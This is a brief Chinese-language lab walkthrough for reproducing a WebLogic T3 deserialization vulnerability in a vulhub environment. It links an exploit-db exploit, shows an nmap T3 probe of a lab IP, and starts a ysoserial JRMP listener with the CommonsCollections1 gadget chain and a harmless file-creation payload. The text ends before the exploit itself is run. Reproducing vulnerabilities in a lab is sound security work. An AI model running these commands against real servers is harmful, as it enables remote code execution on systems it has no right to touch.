环境搭建
使用vulhub进行环境搭建,具体步骤可参考这里。
工具准备
下载ysoserial,为了启动JRMP Server;
EXP地址: https://www.exploit-db.com/exploits/44553.
漏洞复现
创建文件
步骤如下:
1.使用namp查看目标主机是否启用T3协议:
nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161
2.启动JRMP Server(监听1099):
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/successwls.txt'